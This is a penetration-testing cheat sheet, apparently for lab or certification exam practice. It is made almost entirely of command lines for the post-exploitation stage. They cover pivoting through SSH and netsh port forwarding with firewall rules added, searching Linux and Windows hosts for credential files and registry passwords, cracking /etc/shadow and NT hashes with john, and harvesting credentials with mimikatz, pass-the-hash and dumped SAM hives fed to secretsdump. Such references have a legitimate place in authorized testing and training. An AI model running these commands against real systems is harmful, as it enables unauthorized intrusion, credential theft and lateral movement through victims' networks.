sudo ssh -N -L <attacker IP>:445:<non-internet-connected victim IP>:445 <victim user>@<internet-connected victim>

if you're doing SMB make sure /etc/samba/smb.conf on your attacker machine has min protocol = SMB2 in it.

If for some reason, an exploit cannot run locally on the target machine, the port can be forwarded using SSH to your local machine:

ssh -R <local port>:127.0.0.1:<target port> <username>@<local machine>

SSH Remote Port Forwarding:

internet-connected victim facilitating attacker machine connecting to port on internet-connected victim that isn't allowed through the firewall - run on internet-connected Linux victim:

ssh -N -R <attacker machine>:2221:127.0.0.1:3306 <attacker user>@<attacker machine>

now we can scan the originally unavailable port:

sudo nmap -sS -sV 127.0.0.1 -p 2221

SSH + SOCKS4 Dynamic Port Forwarding:

internet-connected victim facilitating attacker machine connecting to non-internet-connected victims - run on attacker machine:

sudo ssh -N -D 127.0.0.1:8080 <victim user>@<internet-connected victim>

configure SOCKS4 proxy in /etc/proxychains.conf: socks4 127.0.0.1 8080, and now run tools through it:

sudo proxychains nmap --top-ports=20 -sT -Pn <non-internet-connected victim>

Netsh Port Forwarding (Old Windows):

set up the internet-connected victim to facilitate a connection to a non-internet-connected victim:

netsh interface portproxy add v4tov4 listenport=4455 listenaddress=<internet-connected victim> connectport=445 connectaddress=<non-internet-connected victim>

allow this kind of traffic to traverse internal firewall:

netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=<internet-connected victim> localport=4455 action=allow

connect to non-internet-connected victim from attacker by connecting to relevant port on internet-connected victim:

smbclient -L <internet-connected victim> --port=4455 --user=Administrator

Collect Evidence

Linux

cat proof.txt
cat local.txt
ifconfig
ip a

Home Directories: ls -lahR /home/

Connections to other machines / internal networks:

netstat -antulp
/sbin/route
ufw status numbered

Search for File Names:

find / -type f -name '*cred*'
find / -type f -name '*password*'
find / -type f -name '*key*'
find / -type f -name "*ssh*"

Secrets about other machines / internal networks: find / -type f -name '*secret*'

Search for File Contents: grep -Ri password (don't do this at /)

Find things owned by a specific user or group:

find / -group <group name>
find / -user <user name>

Any databases running here we want to get info out of?

dpkg -l | grep database
mysql -u<db user> -p<db user password> -e 'show databases;'

Investigate scheduled jobs for more interesting info: for dir in $( ls /etc/ | grep cron); do ls -al /etc/$dir; done

/etc/passwd /etc/shadow

Password Attacks: crackstation

hashid <hash>
unshadow passwd-file.txt shadow-file.txt > unshadowed.txt
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

Windows

type proof.txt
type local.txt
ipconfig
type network-secret.txt

Get Searchable Lists of all the Folders and Files:

tree c:\ > folders.txt
dir /s c:\ > files.txt

Search for File Names:

dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini
gci -recurse -filter "proof.txt" -File
gci -recurse -filter "*proof*" -File

Search for File Contents:

cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*

Connections to other machines / internal networks: netstat -ano

Home Directories: C:\Users\

Kerberos: krbtgt, klist

Password Attacks: crackstation

hashid <hash>

mimikatz.exe privilege::debug token::elevate
sekurlsa::logonpasswords, lsadump::sam, sekurlsa::tickets
kerberos::list

pth-winexe -U <victim user>%<LM hash>:<NTLM hash> //<victim IP> cmd

sudo john hash.txt --format=NT
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=NT

Older Operating System Password Attacks:

pwdump
fgdump
wce

# on the victim machine
reg save HKLM\SAM c:\SAM
reg save HKLM\System c:\System
reg save HKLM\Security c:\Security

# transfer to attacker machine then run 
samdump2 -o output.txt System SAM
# or also 
secretsdump.py -sam SAM -security Security -system System

Looting for Passwords in Windows:

%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system

Searching the Registry for Passwords:

REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K

Contributors: thisismegatron
